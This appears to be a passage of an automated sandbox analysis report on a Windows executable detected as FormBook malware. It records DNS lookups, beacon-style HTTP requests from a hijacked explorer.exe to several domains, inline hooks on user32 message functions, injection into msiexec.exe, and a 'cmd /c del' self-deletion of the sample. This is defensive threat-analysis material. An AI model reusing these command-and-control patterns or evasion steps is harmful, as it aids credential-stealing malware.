                    Jan 14, 2022 03:38:27.765955925 CET | 8.8.8.8 | 192.168.2.3 | 0x7cdd | No error (0) | www.nanasyhogar.com | nanasyhogar.com | | CNAME (Canonical name) | IN (0x0001)
                    Jan 14, 2022 03:38:27.765955925 CET | 8.8.8.8 | 192.168.2.3 | 0x7cdd | No error (0) | nanasyhogar.com | | 50.31.177.38 | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:38:48.656395912 CET | 8.8.8.8 | 192.168.2.3 | 0x7e08 | No error (0) | www.alibabasdeli.com | | 172.67.173.57 | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:38:48.656395912 CET | 8.8.8.8 | 192.168.2.3 | 0x7e08 | No error (0) | www.alibabasdeli.com | | 104.21.30.160 | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:39:09.309283972 CET | 8.8.8.8 | 192.168.2.3 | 0xd5ac | No error (0) | www.gigasupplies.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
                    Jan 14, 2022 03:39:09.309283972 CET | 8.8.8.8 | 192.168.2.3 | 0xd5ac | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)
                    Jan 14, 2022 03:39:29.602072954 CET | 8.8.8.8 | 192.168.2.3 | 0x1d40 | No error (0) | www.mnbvending.com | | 199.59.243.200 | A (IP address) | IN (0x0001)

                    HTTP Request Dependency Graph

                    • www.nanasyhogar.com
                    • www.alibabasdeli.com
                    • www.gigasupplies.com

                    HTTP Packets

                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.3 | 49793 | 50.31.177.38 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 03:38:27.889576912 CET | 10300 | OUT | GET /nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf HTTP/1.1
                    Host: www.nanasyhogar.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:38:28.461199999 CET | 10301 | IN | HTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html; charset=UTF-8
                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                    cache-control: no-cache, must-revalidate, max-age=0
                    x-redirect-by: WordPress
                    location: https://www.nanasyhogar.com/nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf
                    content-length: 0
                    date: Fri, 14 Jan 2022 02:38:27 GMT


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    1 | 192.168.2.3 | 49808 | 172.67.173.57 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 03:38:48.677973032 CET | 12054 | OUT | GET /nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf HTTP/1.1
                    Host: www.alibabasdeli.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:38:48.705641031 CET | 12055 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Fri, 14 Jan 2022 02:38:48 GMT
                    Transfer-Encoding: chunked
                    Connection: close
                    Cache-Control: max-age=3600
                    Expires: Fri, 14 Jan 2022 03:38:48 GMT
                    Location: https://www.alibabasdeli.com/nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IgjFfWdmsLKF6nMy5eaecanBpYGYtijY%2F9ML7bYbo0jwULbFmirtMXIUFdaeYKaZw0SjcZLe8AgxrbUYROuDN%2FNsw420lPpE5m2qvu%2BdTZvcH%2BD2gpXk494OMVi7AvX9wFxVMZB9xg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6cd37d8248424df4-FRA
                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    2 | 192.168.2.3 | 49819 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Jan 14, 2022 03:39:09.329226017 CET | 12088 | OUT | GET /nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf HTTP/1.1
                    Host: www.gigasupplies.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    Jan 14, 2022 03:39:09.373367071 CET | 12089 | IN | HTTP/1.1 403 Forbidden
                    Date: Fri, 14 Jan 2022 02:39:09 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Vary: Accept-Encoding
                    X-Sorting-Hat-PodId: 188
                    X-Sorting-Hat-ShopId: 60258091197
                    X-Dc: gcp-europe-west1
                    X-Request-ID: 077675b5-2854-474a-9745-e2e99dc925ce
                    X-Permitted-Cross-Domain-Policies: none
                    X-XSS-Protection: 1; mode=block
                    X-Download-Options: noopen
                    X-Content-Type-Options: nosniff
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 6cd37e035a694e0e-FRA
                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


                    Code Manipulations

                    User Modules

                    Hook Summary

                    Function Name | Hook Type | Active in Processes
                    PeekMessageA | INLINE | explorer.exe
                    PeekMessageW | INLINE | explorer.exe
                    GetMessageW | INLINE | explorer.exe
                    GetMessageA | INLINE | explorer.exe

                    Processes

                    Process: explorer.exe, Module: user32.dll
                    Function Name | Hook Type | New Data
                    PeekMessageA  | INLINE    | 0x48 0x8B 0xB8 0x85 0x5E 0xE0
                    PeekMessageW  | INLINE    | 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                    GetMessageW   | INLINE    | 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
                    GetMessageA   | INLINE    | 0x48 0x8B 0xB8 0x85 0x5E 0xE0

                    Statistics

                    Behavior


                    System Behavior

                    General

                    Start time:03:37:19
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0x400000
                    File size:248302 bytes
                    MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Start time:03:37:20
                    Start date:14/01/2022
                    Path:C:\Users\user\Desktop\nji3Lg1ot6.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0x400000
                    File size:248302 bytes
                    MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Start time:03:37:23
                    Start date:14/01/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff720ea0000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    General

                    Start time:03:37:42
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\autochk.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\SysWOW64\autochk.exe
                    Imagebase:0xdc0000
                    File size:871424 bytes
                    MD5 hash:34236DB574405291498BCD13D20C42EB
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:03:37:42
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\msiexec.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\msiexec.exe
                    Imagebase:0x890000
                    File size:59904 bytes
                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    General

                    Start time:03:37:46
                    Start date:14/01/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
                    Imagebase:0xd80000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:03:37:47
                    Start date:14/01/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7f20f0000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis
